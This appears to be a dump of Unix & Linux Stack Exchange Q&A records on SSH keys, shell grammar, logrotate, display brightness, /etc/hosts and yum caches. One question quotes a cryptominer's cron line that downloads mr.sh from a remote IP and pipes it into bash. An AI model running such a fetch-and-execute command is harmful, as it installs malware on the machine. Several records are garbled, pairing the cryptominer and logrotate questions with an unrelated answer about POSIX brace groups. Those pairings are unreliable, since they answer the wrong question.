526,527 | Long ago I generated a key pair using ssh-keygen and I used ssh-copy-id to enable login onto many development VMs without manually having to enter a password. I've also uploaded my public key on GitHub, GitLab and similar to authenticate to git repositories using git@ instead of https:// . How can I reinstall my Linux desktop and keep all these logins working? Is backing up and restoring ~/.ssh/ enough? | You need to back up your private keys, at the very least. They cannot be regenerated without having to replace your public key everywhere. These would normally have a name starting with id_ and no extension. The public keys can be regenerated with this command: ssh-keygen -y -f path/to/private/key . Your user configuration (a file called "config") could also be useful if you have set any non-defaults. All of these files would normally be in ~/.ssh, but check first! | {
"score": 6,
"source": [
"https://unix.stackexchange.com/questions/526527",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/353460/"
]
} |
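A minimal backup-and-restore round trip, assuming everything of interest lives in ~/.ssh; the important part after restoring is putting the strict permissions back:

```bash
tar czf ssh-backup.tar.gz -C "$HOME" .ssh    # before reinstalling

tar xzf ssh-backup.tar.gz -C "$HOME"         # after reinstalling
chmod 700 ~/.ssh
chmod 600 ~/.ssh/id_* ~/.ssh/config          # keys and config must not be readable by others
```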
526,537 | I know this sounds really dumb, and I don't plan on using this much, but is there a way with xrandr or something similar to make my display show the equivalent of grayscale but using a color instead of gray? I think it would be a really cool effect for some applications. | (This only addresses X11, not Wayland or other display management systems. Some of these techniques can be applied using other tools, e.g. the accessibility features of GNOME Shell .) I can think of two ways of getting an amber display: insert a compositing plugin which fixes up all colours, and creating a colour profile which corrects all colours to an amber equivalent. Both of these probably involve more effort than they’re worth (apart from the learning side of things). You can get a good approximation for primary colour displays by manipulating the per-channel gamma, as explained in sigvei’s answer ; xcalib can also give access to this, and allows controlling the brightness and contrast directly as well as specifying the gamma value: xcalib -blue 1.0 0 1.0 -red 1.0 0 1.0 -alter results in a green display. Brightness and contrast are applied to the gamma ramps so xrandr will allow you to achieve the same results. It’s possible to control the gamma ramps more finely still, but that won’t allow you to remap everything to amber colours anyway. You can “clamp” channels to certain ranges, so for example a bright red will have some green introduced and thus appear more amber-ish, but then dark reds would appear green... The following code shows how to go about this (with no error-handling): #include <X11/Xos.h>#include <X11/Xlib.h>#include <X11/extensions/xf86vmode.h>#include <stdlib.h>int main(int argc, char **argv) { Display * dpy = NULL; int screen = -1; u_int16_t * r_ramp = NULL, * g_ramp = NULL, * b_ramp = NULL; unsigned int ramp_size = 256; int r_tgt = 255, g_tgt = 191, b_tgt = 0; int i; dpy = XOpenDisplay(NULL); screen = DefaultScreen(dpy); /* Set up ramps */ XF86VidModeGetGammaRampSize(dpy, screen, &ramp_size); r_ramp = (unsigned short *) calloc(ramp_size, sizeof(u_int16_t)); g_ramp = (unsigned short *) calloc(ramp_size, sizeof(u_int16_t)); b_ramp = (unsigned short *) calloc(ramp_size, sizeof(u_int16_t)); for (i = 0; i < ramp_size; i++) { r_ramp[i] = r_tgt * 256 * i / ramp_size; g_ramp[i] = g_tgt * 256 * i / ramp_size; b_ramp[i] = b_tgt * 256 * i / ramp_size; } XF86VidModeSetGammaRamp(dpy, screen, ramp_size, r_ramp, g_ramp, b_ramp); XCloseDisplay(dpy);} (You’ll need -lX11 -lXxf86vm to link.) | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/526537",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/223417/"
]
} |
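For completeness, building and undoing the tint might look like this (the output file name and the connector name are assumptions; check yours with xrandr):

```bash
cc -o amber amber.c -lX11 -lXxf86vm
./amber                                             # screen is now amber-tinted
xrandr --output eDP-1 --gamma 1:1:1 --brightness 1  # one way back on most drivers
```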
526,574 | TL;DR : Why does a POSIX brace group need spaces after the { reserved word, but a subshell doesn't after the reserved word ( ? POSIX shell grammar defines brace group and subshell as follows brace_group : Lbrace compound_list Rbracesubshell : '(' compound_list ')' Now, if we're reading that literally, spaces are significant. This would mean that there has to be a space delimiting the opening and closing brace and parenthesis as in { echo hello world; }( echo hello world ) This would also align with Compound Command definitions : Each of these compound commands has a reserved word or control operator at the beginning, and a corresponding terminator reserved word or operator at the end. However, what doesn't make sense is why (list) and ( list ) work just fine (that space after ( is not required), whereas a brace group has to have a leading space, i.e. {echo hello;} wouldn't work. Of course, a reserved word being treated as a shell word would make sense in needing a space afterwards, to align with the concept of field splitting ; however, the definition itself makes no mention of spaces. Further, if { and ( are both considered reserved words by the POSIX definition of compound command, why are they treated differently in regard to the space character after these reserved words? Now, the ksh(1) manual does state: Words, which are sequences of characters, are delimited by unquoted white-space characters (space, tab and newline) or meta-characters (<, >, |, ;, &, ( and )) In other words, it makes sense that ksh would recognize ( as a word delimiter, where the first word would be a command or variable assignment. POSIX, however, doesn't appear to mention ( as a meta-character. The only possible explanation I found as far as the POSIX grammar goes is that { is considered a "token", whereas ( is not listed as one. /* These are reserved words, not operator tokens, and are recognized when reserved words are recognized. */%token Lbrace Rbrace Bang/* '{' '}' '!' */ So what would be the precise reasoning for this discrepancy? Accepted Answer Notes: Moved the accepted checkmark to Isaac's answer since it provides a quote from the standard itself which directly addresses my question: For instance, '(' and ')' are control operators, so that no <space> is needed in (list). However, '{' and '}' are reserved words in { list;}, so that in this case the leading <space> and <semicolon> are required. Accepting Kusalananda's answer. Kusalananda's answer addresses what I needed, though mostly from an informal and intuitive point of view; it points out that { is a reserved word and ( is an operator. Michael Homer also noted the same in the comments - that the Compound Command definition states (emphasis added): Each of these compound commands has a reserved word or control operator at the beginning { is defined as a reserved word, similar to for or while , listed in Shell Grammar (see the last code block in the question) Section 2.9 states (emphasis added): In particular, the representations include spacing between tokens in some places where <blank> s would not be necessary (when one of the tokens is an operator). While the standard doesn't explicitly define ( as an operator, ( is referred to as an operator; specifically, section 2.9.2 says If the pipeline begins with the reserved word ! and command1 is a subshell command, the application shall ensure that the ( operator at the beginning of command1 is separated from the ! by one or more characters. The behavior of the reserved word ! immediately followed by the ( operator is unspecified. 
A question on Stack Overflow by Digital Trauma points out Section 2.4 on Reserved Words: This recognition shall only occur when none of the characters is quoted and when the word is used as: -The first word of a command As mentioned in Kusalananda's answer "The spaces shown in the POSIX grammar are not spaces that need to be there in the shell input data, but just a way of displaying the grammar itself. It is the fact that the braces are reserved words that implies that they have to be surrounded by whitespace" As mentioned by Michael Homer in the comments: "If the spaces were significant in their own right, they'd need to be listed in the production " Case closed. | The difference between the curly braces and the parentheses is that the braces (and ! ) are reserved words, just like for , if , then etc., while parentheses are control operators. Words need to be separated by whitespace. This means that just like you can't have foriin*; do you can't have {somecommand;} >file or if !somecommand; then The spaces shown in the POSIX grammar are not spaces that need to be there in the shell input data, but just a way of displaying the grammar itself. It is the fact that the braces are reserved words that implies that they have to be surrounded by whitespace, while the parentheses of a subshell don't. | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/526574",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/85039/"
]
} |
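The practical consequence is easy to see at a prompt:

```bash
$ { echo hi; }    # reserved word: the space and the terminator are required
hi
$ {echo hi;}      # no space, so the shell looks for a command named "{echo"
bash: {echo: command not found
$ (echo hi)       # control operator: self-delimiting, no spaces needed
hi
```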
526,578 | Hello everyone, My machine has been hijacked by a bitcoin miner. He has a cron job that runs every 2 seconds. Using crontab -e to delete it doesn't work because it respawns soon after. I can't edit it with either the nano or vi editor, because each time I try, he has some code running that kills either editor as soon as I open it. Below is his cron job: */30 * * * * (curl -s http://192.210.175.103/mr.sh||wget -q -O - http://192.210.175.103/mr.sh)|bash -sh The job is being run from /tmp but the originating file keeps changing. Any ideas on how to fix this? Thanks | The difference between the curly braces and the parentheses is that the braces (and ! ) are reserved words, just like for , if , then etc., while parentheses are control operators. Words need to be separated by whitespace. This means that just like you can't have foriin*; do you can't have {somecommand;} >file or if !somecommand; then The spaces shown in the POSIX grammar are not spaces that need to be there in the shell input data, but just a way of displaying the grammar itself. It is the fact that the braces are reserved words that implies that they have to be surrounded by whitespace, while the parentheses of a subshell don't. | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/526578",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/359287/"
]
} |
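The usual advice for a compromised host is to wipe and reinstall it; as a stopgap while investigating, something along these lines (using the IP from the cron entry above) can break the respawn loop:

```bash
crontab -r                                       # drop the injected crontab
iptables -I OUTPUT -d 192.210.175.103 -j DROP    # block re-downloads of mr.sh
# then find and kill the running payload processes under /tmp
```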
526,595 | I have the below configuration for access logs cat /etc/logrotate.d/logrotate_nginx.conf/nginx/access/logs/*.log { rotate 2 size 1k missingok compress notifempty copytruncate} There is no time interval configuration. This should mean it has to rotate the logs at '/nginx/access/logs/' after they reach 1 kilobyte, right? But this is the log rotation now / # ls -l /nginx/access/logs/total 8-rw-r--r-- 1 root root 1264 Jun 24 11:17 nginx-access.log-rw-r--r-- 1 root root 1292 Jun 24 11:17 nginx-access_withbody.log-rw-r--r-- 1 root root 0 Jun 24 11:16 nginx-error.log This is logrotate.status / # cat /var/lib/logrotate.statuslogrotate state -- version 2"/var/log/acpid.log" 2019-6-24-11:0:0"/mnt/mesos/sandbox/logs/nginx-error.log" 2019-6-24-11:0:0"/mnt/mesos/sandbox/logs/nginx-access.log" 2019-6-24-11:0:0"/mnt/mesos/sandbox/logs/nginx-access_withbody.log" 2019-6-24-11:0:0 I want to know why it is not rotating, or whether the issue is with the conf. And as per the documentation of size: This option is mutually exclusive with the time interval options, and it causes logfiles to be rotated without regard for the last rotation time, if specified after the time criteria | The difference between the curly braces and the parentheses is that the braces (and ! ) are reserved words, just like for , if , then etc., while parentheses are control operators. Words need to be separated by whitespace. This means that just like you can't have foriin*; do you can't have {somecommand;} >file or if !somecommand; then The spaces shown in the POSIX grammar are not spaces that need to be there in the shell input data, but just a way of displaying the grammar itself. It is the fact that the braces are reserved words that implies that they have to be surrounded by whitespace, while the parentheses of a subshell don't. | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/526595",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/359300/"
]
} |
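Note that size is only evaluated when logrotate actually runs, which on most systems is a daily cron job; to test the configuration on demand:

```bash
logrotate -d /etc/logrotate.d/logrotate_nginx.conf    # dry run: show what would rotate and why
logrotate -f /etc/logrotate.d/logrotate_nginx.conf    # force an immediate rotation
```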
526,653 | I would like to control the screen brightness in i3 , in Intel laptops that come with Fn keys for the purpose. These keys function with any other DE. First making sure devices available are Intel: $ ls -l /sys/class/backlight/total 0lrwxrwxrwx 1 root root 0 juin 24 18:26 intel_backlight -> ../../devices/pci0000:00/0000:00:02.0/drm/card0/card0-eDP-1/intel_backlight In another forum the programme xbacklight is suggested as means to control brightness in i3 . However it fails in the laptops I tried so far: $ xbacklight -inc 10No outputs have backlight property Is there any other way to control brightness in i3 ? | To change your screen brightness, you can use xrandr . In order to do this, you can do: xrandr -q | grep ' connected' | head -n 1 | cut -d ' ' -f1 That will return all the connected monitors (like LVDS-1 or DVI-D-0 for instance). Now, to change the screen brightness do the command (replace the DVI-D-0 by the precedent command output): xrandr --output DVI-D-0 --brightness 0.7 For instance, this command sets the brightness to 70%. I hope it will help ! | {
"score": 5,
"source": [
"https://unix.stackexchange.com/questions/526653",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/56887/"
]
} |
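To wire this into i3, the Fn keys can be bound in the i3 config; since xrandr --brightness is absolute rather than incremental, a backlight helper such as brightnessctl (an assumption; any tool writing to /sys/class/backlight works) is more convenient:

```
bindsym XF86MonBrightnessUp   exec --no-startup-id brightnessctl set +10%
bindsym XF86MonBrightnessDown exec --no-startup-id brightnessctl set 10%-
```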
526,745 | I have two servers hosted in IDC. I can only use ports 20/21/22/23/3389/33101-33109 to establish connections between two servers. The IDC network device will block any other packets whose source or destination port is not in the 20/21/22/23/80/3389/33101-33109 list/range. But the source port of SSH is random. Using the command ssh username @ server -p remote_port one can easily specify a remote port. So is there an ssh command parameter or some other way to specify a local source port so I can use, for example, port 33101 to establish the SSH connection? My network topology is like this: | You can not specify the source port for ssh client. But you can use nc as a proxy, like this: ssh -p 33101 -o 'ProxyCommand nc -p 33101 %h %p' $SERVER_2 From How can i set the source port for SSH on unbuntu server? (on ServerFault) . | {
"score": 6,
"source": [
"https://unix.stackexchange.com/questions/526745",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/359405/"
]
} |
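The same trick expressed as a ~/.ssh/config entry, with placeholder names for the second server:

```
Host server2
    HostName 192.0.2.10              # hypothetical address of SERVER_2
    Port 33101
    ProxyCommand nc -p 33101 %h %p
```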
526,780 | Changes to /etc/hosts file seem to take effect immediately. I'm curious about the implementation. What magic is used to achieve this feature? Ask Ubuntu: After modifying /etc/hosts which service needs to be restarted? NetApp Support: How the /etc/hosts file works | The magic is opening the /etc/hosts file and reading it: strace -e trace=file wget -O /dev/null http://www.google.com http://www.facebook.com http://unix.stackexchange.com 2>&1 | grep hostsopen("/etc/hosts", O_RDONLY|O_CLOEXEC) = 4open("/etc/hosts", O_RDONLY|O_CLOEXEC) = 5open("/etc/hosts", O_RDONLY|O_CLOEXEC) = 4 The getaddrinfo(3) function, which is the only standard name resolving interface, will just open and read /etc/hosts each time it is called to resolve a hostname. More sophisticated applications which are not using the standard getaddrinfo(3) , but are still somehow adding /etc/hosts to the mix (e.g. the dnsmasq DNS server) may be using inotify(7) to monitor changes to the /etc/hosts files and re-read it only if needed. Browsers and other such applications will not do that. They will open and read /etc/hosts each time they need to resolve a host name, even if they're not using libc's resolver directly, but are replicating its workings by other means. | {
"score": 6,
"source": [
"https://unix.stackexchange.com/questions/526780",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/359439/"
]
} |
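Any NSS-based resolver can be watched doing this; getent goes through the same getaddrinfo path (recent glibc issues openat rather than open):

```bash
getent hosts www.google.com    # resolves via NSS, consulting /etc/hosts on each call
strace -e trace=open,openat getent hosts www.google.com 2>&1 | grep hosts
```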
526,924 | Background: I'm absolutely new to OpenBSD and trying to install OpenBSD 6.5 into Dell G3 3779. At first, the OpenBSD's UEFI bootloader showed that it detected 3 disks, including the bootable USB flash drive. boot > machine diskinfoDisk BlkSiz IoAlign Size Flags Checksumhd0 512 0 28GB 0x4 .... Removablehd1 512 1 931GB 0x0 ....hd2 512 1 119GB 0x0 .... According to the PC spec, it has 128GB SSD and 1TB HDD. So this looked alright. I continued boot and install.. > boot...sd0 as scsibus0 targ 1 lun 0: <ELECOM, MF-HTU3, PMAP> SCSI4 0/direct removable serial.056e....sd0: 29574MB, 512 bytes/sector, 60567552 sectors...Welcome to the OpenBSD/amd64 6.5 installation program.(I)nstall, (U)pgrade, (A)utoinstall or (S)hell? I...... However, at disk settings step, I stopped and wondered that the installer was going to install the OS into the USB drive, not disks in the PC. Available disks are: sd0.Which disk is the root disk? ('?' for details) [sd0] (press enter key)Disk: sd0 geometry: 3770/255/63 [60567552 Sectors]Offset: 0 Signegure: 0xAA55#: id C H S - C H S0: EF 0 1 2 - 0 16 16 [ 64: 960 ] EFI Sys1: 00 0 0 0 - 0 0 0 [ 0: 0 ] unused2: 00 0 0 0 - 0 0 0 [ 0: 0 ] unused3: A6 0 16 17 - 57 92 35 [ 1024: 920512 ] OpenBSD It seemed to show only 1 disk for disk setting, and the sd0 seemed being recoginized as the USB device. Question: Was this right installer's behavior?Or is it right guess that the installer couldn't detect the hard disks although the bootloader could? P.S English is not my native language; please excuse typing, grammar or/and word selecting errors. UPDATE1: 'not configured' lines in dmesg cpu at mainbus0: not configuredcpu at mainbus0: not configuredcpu at mainbus0: not configuredcpu at mainbus0: not configuredcpu at mainbus0: not configuredcpu at mainbus0: not configuredcpu at mainbus0: not configuredcpu at mainbus0: not configuredcpu at mainbus0: not configuredcpu at mainbus0: not configuredcpu at mainbus0: not configuredacpiec at acpi0 not configuredacpipwrres at acpi0 not configuredacpipwrres at acpi0 not configuredacpipwrres at acpi0 not configuredacpipwrres at acpi0 not configuredacpipwrres at acpi0 not configuredacpipwrres at acpi0 not configuredacpicpu at acpi0 not configuredacpitz at acpi0 not configuredacpipwrres at acpi0 not configured"PNP0A08" at acpi0 not configured"INT3403" at acpi0 not configured"INT3403" at acpi0 not configured"INT3403" at acpi0 not configured"INT3450" at acpi0 not configured"DELL0870" at acpi0 not configured"PNP0C14" at acpi0 not configured"PNP0C14" at acpi0 not configured"PNP0C14" at acpi0 not configured"PNP0C14" at acpi0 not configured"PNP0C14" at acpi0 not configured"INT33A1" at acpi0 not configured"MSFT0101" at acpi0 not configured"PNP0C14" at acpi0 not configured"PNP0C14" at acpi0 not configured"PNP0C14" at acpi0 not configured"PNP0C0D" at acpi0 not configured"PNP0C0C" at acpi0 not configured"PNP0C0E" at acpi0 not configured"ACPI0003" at acpi0 not configured"PNP0C0A" at acpi0 not configured"INT3305" at acpi0 not configured"INT3400" at acpi0 not configuredvendor "NVIDIA", unknown product 0x1c8c (class display subclass 30, rev 0xa1) at pci1 dev 0 function 0 not configured"Intel UHD Graphics 630" rev 0x00 at pci0 dev 2 function 0 not configured"Intel Core 6G Thermal" rev 0x07 at pci0 dev 4 function 0 not configured"Intel Core GMM" rev 0x00 at pci0 dev 8 function 0 not configuredvendor "Intel", unknown product 0xa36f (class memory subclass RAM, rev 0x10) at pci0 dev 20 function 2 not configured"Intel Dual Band Wireless AC 9560" rev 0x10 at pci0 
dev 20 function 3 not configuredvendor "Intel", unknown product 0xa368 (class serial bus unknown subclass 0x00, rev 0x10) at pci0 dev 21 function 0 not configuredvendor "Intel", unknown product 0xa369 (class serial bus unknown subclass 0x00, rev 0x10) at pci0 dev 21 function 1 not configuredvendor "Intel", unknown product 0xa360 (class communications subclass miscellaneous, rev 0x10) at pci0 dev 22 function 0 not configuredvendor "Intel", uknown product 0xa30d (class bridge subclass ISA, rev 0x10) at pci0 dev 31 function 0 not configuredvendor "Intel", uknown product 0xa348 (class multimedia subclass hdaudio, rev 0x10) at pci0 dev 31 function 3 not configuredvendor "Intel", uknown product 0xa323 (class serial bus subclass SMBus, rev 0x10) at pci0 dev 31 function 4 not configuredvendor "Intel", uknown product 0xa324 (class serial bus subclass 0x00, rev 0x10) at pci0 dev 31 function 5 not configured"CNFFH370344001E31F2 Integrated_Webcam_HD" rev 2.00/64.26 addr 2 at uhub0 port 5 not configured"Generic USB2.0-CAW" rev 2.00/39.60 addr 3 at uhub0 port 6 not configured"HTMicroelectronics Goodix Fingerprint Device" rev 2.00/1.00 addr 4 at uhub0 port 9 not configured"vendor 0x0087 product 0x0aaa" rev 2.00/0.02 addr 5 port 14 not configured UPDATE2: All lines in dmesg OpenBSD 6.5 (RAMDISK_CD) #3: Sat Apr 13 14:55:38 MDT 2019 [email protected]:/usr/src/sys/arc/amd64/compile/RAMDISK_CDreal mem = 17016164252 (16227MB)avail mem = 16496480256 (15732MB)mainbus0 at rootbios0 at mainbus0: SMBIOS rev. 3.1 @ 0xe000 (128 entries)bios0: vendor Dell Inc. version “1.4.0” date 09/05/2018bios0: Dell Inc. G3 3779acpi0 at bios0: rev 2acpi0: tables DSDT FACP APIC FPDT FIDT MCFG SSDT SSDT BOOT HPET SSDT UEFI LPIT SSDT SSDT DBGP DBG2 SSDT SSDT MSDM SLIC SSDT SSDT DMAR BGRT UEFI TPM2 SSDTacpimadt0 at acpi0 addr 0xfee00000: PC-AT compatcpu0 at mainbus0: apid 0 (boot processor)cpu0: Intel(R)Core(TM) i7-8750H CPU @ 2.20GHz, 3893.13 MHz, 06-9e-0acpu0: FPU,VME,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT, PSE36,CFLUSH,DS,ACPI,MMX,FXSR,SSE,SSE2,SS,HTT,TM,PBE,SSE3,PCLMUL,DTES46, MWAIT,DS-CPL,VMX,EST,TM2,SSSE3,SDBG,FMA3,CX16,xTPR,PDCM,PCID,SSE4.1, SSE4.2,x2APIC,MOVBE,POPCNT,DEADLINE,AES,XSAVE,AVX,F16C,RDRAND,NXE, PAGE16B,ADTSCP,LONG,LAHF,ABM,3DNOWP,PERF,ITSC,FSGSBASE,SGX,BMI1,AVX2, SMEP,BMI2,EAMS,INVPCID,MPX,RDSEED,ADX,SMAP,CLFLUSHOPT,PT,IBAS,IBPB, STIBP,L1DF,SSBD,SENSOR,AAAT,XSAVEOPT,XSAVEC,XGETBV1,XSAVES,MELTDOWNcpu0: 256KB 64b/line 8-way L21 cachecpu0: apic clock running at 24MHzcpu0: mwait min=64, max=64, C-substates=0.2.1.2.4.1.1.1, IBEcpu at mainbus0: not configuredcpu at mainbus0: not configuredcpu at mainbus0: not configuredcpu at mainbus0: not configuredcpu at mainbus0: not configuredcpu at mainbus0: not configuredcpu at mainbus0: not configuredcpu at mainbus0: not configuredcpu at mainbus0: not configuredcpu at mainbus0: not configuredcpu at mainbus0: not configuredioapic0 at mainbus0: apid 2 pa 0xfec00000, version 20, 120 pinsacpiprt0 at acpi0: bus 0 (PCI0)acpiprt1 at acpi0: bus 1 (PEG0)acpiprt2 at acpi0: bus -1 (PEG1)acpiprt3 at acpi0: bus -1 (PEG2)acpiprt4 at acpi0: bus -1 (AP01)acpiprt5 at acpi0: bus -1 (AP02)acpiprt6 at acpi0: bus -1 (AP03)acpiprt7 at acpi0: bus -1 (AP04)acpiprt8 at acpi0: bus -1 (AP05)acpiprt9 at acpi0: bus -1 (AP06)acpiprt10 at acpi0: bus -1 (AP07)acpiprt11 at acpi0: bus -1 (AP08)acpiprt12 at acpi0: bus -1 (AP09)acpiprt13 at acpi0: bus -1 (AP10)acpiprt14 at acpi0: bus -1 (AP11)acpiprt15 at acpi0: bus -1 (AP12)acpiprt16 at acpi0: bus -1 (AP13)acpiprt17 at acpi0: bus 59 
(AP14)acpiprt18 at acpi0: bus -1 (AP16)acpiprt19 at acpi0: bus -1 (AP17)acpiprt20 at acpi0: bus -1 (AP18)acpiprt21 at acpi0: bus -1 (AP19)acpiprt22 at acpi0: bus -1 (AP20)acpiprt23 at acpi0: bus 2 (AP21)acpiprt24 at acpi0: bus -1 (AP22)acpiprt25 at acpi0: bus -1 (AP23)acpiprt26 at acpi0: bus -1 (AP24)acpiprt27 at acpi0: bus -1 (AP15)acpiec0 at acpi0acpiec at acpi0 not configuredacpipwrres at acpi0 not configuredacpipwrres at acpi0 not configuredacpipwrres at acpi0 not configuredacpipwrres at acpi0 not configuredacpipwrres at acpi0 not configuredacpipwrres at acpi0 not configuredacpicpu at acpi0 not configuredacpitz at acpi0 not configuredacpipwrres at acpi0 not configured"PNP0A08" at acpi0 not configuredacpicmos0 at acpi0"INT3403" at acpi0 not configured"INT3403" at acpi0 not configured"INT3403" at acpi0 not configured"INT3450" at acpi0 not configured"DELL0870" at acpi0 not configured"PNP0C14" at acpi0 not configured"PNP0C14" at acpi0 not configured"PNP0C14" at acpi0 not configured"PNP0C14" at acpi0 not configured"PNP0C14" at acpi0 not configured"INT33A1" at acpi0 not configured"MSFT0101" at acpi0 not configured"PNP0C14" at acpi0 not configured"PNP0C14" at acpi0 not configured"PNP0C14" at acpi0 not configured"PNP0C0D" at acpi0 not configured"PNP0C0C" at acpi0 not configured"PNP0C0E" at acpi0 not configured"ACPI0003" at acpi0 not configured"PNP0C0A" at acpi0 not configured"INT3305" at acpi0 not configured"INT3400" at acpi0 not configuredpci0 at mainbus0 bus00:31:5: mem address conflict 0xfe010000/0x1000pchb0 at pci0 dev 0 function 0 "Intel Core 8G Host" rev 0x07ppb0 at cpi0 dev 1 function 0 "Intel Core 6G PCIE" rev 0x07: msipci1 at ppb0 bus 1vendor "NVIDIA", unknown product 0x1c8c (class display subclass 30, rev 0xa1) at pci1 dev 0 function 0 not configured"Intel UHD Graphics 630" rev 0x00 at pci0 dev 2 function 0 not configured"Intel Core 6G Thermal" rev 0x07 at pci0 dev 4 function 0 not configured"Intel Core GMM" rev 0x00 at pci0 dev 8 function 0 not configuredvendor "Intel", unknown product 0xa379 (class DASP subclass miscellaneous, rev 0x10) at pci0 dev 18xhci0 at pci0 dev 20 function 0 vendor "Intel", unknown product 0xa36d rev 0x10: msi, xHCI 1.10usb0 at xhci0: USB revision 3.0uhub0 at usb0 configuration 1 interface 0 "Intel xHCI root hub" rev 3.00/1.00 addr 1vendor "Intel", unknown product 0xa36f (class memory subclass RAM, rev 0x10) at pci0 dev 20 function 2 not configured"Intel Dual Band Wireless AC 9560" rev 0x10 at pci0 dev 20 function 3 not configuredvendor "Intel", unknown product 0xa368 (class serial bus unknown subclass 0x00, rev 0x10) at pci0 dev 21 function 0 not configuredvendor "Intel", unknown product 0xa369 (class serial bus unknown subclass 0x00, rev 0x10) at pci0 dev 21 function 1 not configuredvendor "Intel", unknown product 0xa360 (class communications subclass miscellaneous, rev 0x10) at pci0 dev 22 function 0 not configuredpciide0 at pci0 dev 23 function 0 "Intel 82801HBM RAID" rev 0x10: DMA, channel 0 wired to native-PCI, channel 1 wired to native-PCIpciide0: using apic 2 int 16 for native-PCI interruptppb1 at pci0 dev 27 function 0 vendor "Intel", unknown product 0xa32c rev 0xf0: msipci2 at ppb1 bus 2ppb2 at pci0 dev 29 function 0 vendor "Intel", unknown product 0xa335 rev 0xf0: msipci3 at ppb2 bus 59re0 at pci3 dev 0 function 0 "Realtek 8168" rev 0x15: RTL8168H/8111H (0x5400), msi, address 3c:2c:30:ac:c8:59rgephy0 at re0 phy 7: RTL8251 PHY, rev. 
0vendor "Intel", uknown product 0xa30d (class bridge subclass ISA, rev 0x10) at pci0 dev 31 function 0 not configuredvendor "Intel", uknown product 0xa348 (class multimedia subclass hdaudio, rev 0x10) at pci0 dev 31 function 3 not configuredvendor "Intel", uknown product 0xa323 (class serial bus subclass SMBus, rev 0x10) at pci0 dev 31 function 4 not configuredvendor "Intel", uknown product 0xa324 (class serial bus subclass 0x00, rev 0x10) at pci0 dev 31 function 5 not configuredisa0 at mainbus0pckbc0 at isa0 port 0x60/5 irq 1 irq 12pckbd0 at pckbc0 (kbd slot)wskbd0 at pckbd0: console keyboardefifb0 at mainbus0: 1920x1080, 32bppwsdisplay0 at efifb0 mux 1: console (std, vt100 emulation), using wskbd0"CNFFH370344001E31F2 Integrated_Webcam_HD" rev 2.00/64.26 addr 2 at uhub0 port 5 not configured"Generic USB2.0-CAW" rev 2.00/39.60 addr 3 at uhub0 port 6 not configured"HTMicroelectronics Goodix Fingerprint Device" rev 2.00/1.00 addr 4 at uhub0 port 9 not configured"vendor 0x0087 product 0x0aaa" rev 2.00/0.02 addr 5 port 14 not configuredumass0 at uhub0 port 19 configuration 1 interface 0 "ELECOM MF-HTU3" rev 3.10/1.10 addr 6umass0: using SCSI over Bulk-Onlyscsibus0 at umass0: 2 targets, initiator 0sd0 at scsibus0 targ 1 lun 0: <ELECOM, MF-HTU3, PMAP> SCSI4 0/direct removable serial.056e6016774D0C907014sd0: 29574MB, 512 bytes/sector, 60567552 sectorssoftraid0 at rootscsibus1 at softraid0: 256 targetsroot on rd0a swap on rd0b dump on rd0b | As Ze Loff told in a comment, it was the SATA controller setting in Bios. The default was using RAID. I changed it to using AHCI.After that, the kernel detected all drives as the bootloader. | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/526924",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/124929/"
]
} |
527,104 | I am using this script on a router (using Entware) to check the response of a website every 15 minutes. It only runs once and terminates after the first 15 minutes. Why?
#! /bin/sh
for i in {1..10}
do
    date >> webresp.csv
    curl -w 'Testing Website Response Time for :%{url_effective}\n\nLookup Time:\t\t%{time_namelookup}\nConnect Time:\t\t%{time_connect}\nPre-transfer Time:\t%{time_pretransfer}\nStart-transfer Time:\t%{time_starttransfer}\n\nTotal Time:\t\t%{time_total}\n' -o /dev/null www.google.com | tee -a webresp.csv
    sleep 900
done | You are using #! /bin/sh, but {1..10} is a bash extension, not standard shell syntax. Bash would expand {1..10} into 10 words; for a standard shell it is just one word, so the loop body runs exactly once.
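A POSIX-compatible sketch of the same loop, keeping the /bin/sh shebang (the body is unchanged from your script):
i=1
while [ "$i" -le 10 ]
do
    date >> webresp.csv
    curl -w '...' -o /dev/null www.google.com | tee -a webresp.csv   # same curl command as above
    sleep 900
    i=$((i + 1))
done
Alternatively, change the shebang to #!/bin/bash if bash is available on the router. | {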
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/527104",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/353107/"
]
} |
527,171 | I have a RHEL7 server managed by Satellite 6.5. The command yum clean all --verbose shows a yum cache of several Mb for untracked repositories. yum clean all doesn't clean this cache. Is it possible to do so, or is the only way to run rm -rf /var/cache/yum/* && yum check-update ? | There have been a few enhancements to the behaviour of yum clean all in the past (most notably https://bugzilla.redhat.com/show_bug.cgi?id=1357083 ) but you are absolutely right that there are edge cases where yum clean all just doesn't do its job properly. rm -rf /var/cache/yum , albeit nasty, does the trick every time. The man page has a short message on cleaning untracked repos: <...> Also note that untracked (no longer configured) repositories will not be automatically cleaned. and To purge the entire cache in one go, the easiest way is to delete the files manually. Depending on your cachedir configuration, this usually means treating any variables as shell wildcards and recursively removing matching directories. For example, if your cachedir is /var/cache/yum/$basearch/$releasever, then the whole /var/cache/yum directory has to be removed. If you do this, yum will rebuild the cache as required the next time it is run (this may take a while). Regarding the last point about rebuilding taking a long time, you might want to follow rm -rf /var/cache/yum with && yum makecache to properly recreate the directories and avoid long waits on the next yum invocation. Note the difference between makecache and makecache fast though, which most people don't really know: yum makecache fast only makes sure the repos are current, while yum makecache actually downloads the metadata.
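In short, a sketch of the full cleanup (assuming the default cachedir of /var/cache/yum/$basearch/$releasever):
du -sh /var/cache/yum                          # optional: see how big the cache is first
sudo rm -rf /var/cache/yum && sudo yum makecache   # wipe everything, untracked repos included, then rebuild | {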
"score": 5,
"source": [
"https://unix.stackexchange.com/questions/527171",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/34039/"
]
} |
